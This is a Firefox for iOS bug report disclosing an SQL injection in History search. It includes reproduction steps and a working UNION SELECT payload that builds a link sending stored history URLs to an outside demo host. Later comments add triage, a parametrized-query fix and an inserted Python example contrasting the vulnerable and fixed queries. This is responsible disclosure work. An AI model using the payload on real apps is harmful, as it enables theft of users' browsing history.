SQL injection in History tab on Firefox iOS
Categories: Firefox for iOS :: General, defect
Tracking:
Tracking | Status |
---|---|---
fxios | 101 | ---
People: Reporter: sdna.muneaki.nishimura, Assigned: nish.bhasin
Details: Keywords: reporter-external, sec-moderate; Whiteboard: [reporter-external] [client-bounty-form]
Attachments: 2 files
In Firefox iOS, the following SQL query incorporates the variable searchTerm as a string.
https://github.com/mozilla-mobile/firefox-ios/blob/b0efb5ad72289b40d912ae0fa9230b6a524679a0/Storage/SQL/SQLiteHistory.swift#L622
The searchTerm can be specified externally, so SQL injection can be triggered.
The steps to reproduce the injection are below.
(1) Visit https://csrf.jp/2022/fxios/history.php
(2) Tap the link on the page, and the attack payload will be stored in your clipboard
(3) Open History tab from the hamburger menu and tap the magnifying glass icon
(4) Paste the search word from your clipboard, then you can see the following payload in the text input field
a" union select 1,'','https://csrf.jp/2022/fxios/history.php?'||group_concat(media_url), 'Click Me!',1,1,1,1,1 from page_metadata;
(5) One history record named "Click Me!" is shown in the history list
(6) Tap the record, and your history data will be stolen by the malicious page
Attached is a video demonstration of the above attack.
Comment 1•3 years ago
Confirming this as a sec-moderate. It is quite bad and we need to fix this, which should be somewhat easy.
The exploit requires user interaction in a somewhat unlikely place, otherwise this could be rated sec-high.
Muneaki: let us know if you manage to improve the attack and we will consider re-evaluating.
Jeremy: Can you help find someone to fix this?
Comment 2•3 years ago
Ticket is now tracked with https://mozilla-hub.atlassian.net/browse/FXIOS-4183 in our JIRA board.
Comment 3•3 years ago (Assignee)
Thanks Laurie for the ticket 🙏
Frederik, we'll bring it into our next sprint, but as we discussed this wouldn't change our release cycle and will most likely go out in our next release.
Adding a parametrized query to handle injections. Link to PR: https://github.com/mozilla-mobile/firefox-ios/pull/10676
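Added example, not code from the firefox-ios project or from the PR above: it uses Python's sqlite3 module (rather than the Swift the bug lives in) to place the defect class from the report next to the parametrized fix this comment describes. The schema, rows and search terms are constructed for the demonstration.

```python
import sqlite3

# Constructed stand-in for the history store: a minimal schema, not the real
# firefox-ios SQLiteHistory schema, just enough to run both query styles.
SCHEMA = """
CREATE TABLE history (id INTEGER PRIMARY KEY, url TEXT, title TEXT);
CREATE TABLE page_metadata (id INTEGER PRIMARY KEY, media_url TEXT);
INSERT INTO history (url, title) VALUES ('https://example.org/docs', 'Docs');
INSERT INTO history (url, title) VALUES ('https://example.org/blog', 'Blog post');
INSERT INTO history (url, title) VALUES ('https://example.org/quotes', 'Quoting "SQL" safely');
INSERT INTO page_metadata (media_url) VALUES ('https://example.org/private-image.png');
"""

def make_db():
    """In-memory SQLite database populated with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def search_history_vulnerable(conn, search_term):
    """Defect class from the report: the term is spliced into the SQL text, so a
    double quote in it ends the literal and whatever follows is parsed as SQL."""
    sql = f'SELECT id, url, title FROM history WHERE title LIKE "%{search_term}%"'
    return conn.execute(sql).fetchall()

def search_history_fixed(conn, search_term):
    """Fix in the spirit of the PR: bind the term as a parameter. SQLite gets the
    statement and the value separately, so no content of the value can change the
    statement. LIKE wildcards are escaped so '%' and '_' match themselves."""
    escaped = (search_term.replace("\\", "\\\\")
                          .replace("%", "\\%")
                          .replace("_", "\\_"))
    sql = "SELECT id, url, title FROM history WHERE title LIKE ? ESCAPE '\\'"
    return conn.execute(sql, ("%" + escaped + "%",)).fetchall()

def run_both(conn, search_term):
    """Return (vulnerable_result, fixed_result); a statement the vulnerable build
    can no longer parse is reported as an 'SQL ERROR: ...' string instead."""
    try:
        vulnerable = search_history_vulnerable(conn, search_term)
    except sqlite3.Error as exc:
        vulnerable = f"SQL ERROR: {exc}"
    return vulnerable, search_history_fixed(conn, search_term)

if __name__ == "__main__":
    db = make_db()
    # A legitimate search containing quotes: the fixed query finds the row,
    # the concatenated one cannot even be parsed, the same root cause as the injection.
    for term in ("Docs", '"SQL"'):
        print(repr(term), "->", run_both(db, term))
```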
Comment 5•3 years ago
LGTM. Please close this ticket once the fix has landed.
Comment 6•3 years ago (Reporter)
I have checked that the issue has been fixed in the latest release v100.1. So I think this ticket can be closed.
Comment 8•4 months ago (Reporter)
Hello! Could you make this bug ticket accessible to the public?
As time has passed since the fix and this product is now already secure, I'd like to make the details of this hacktivity available for anyone to reference.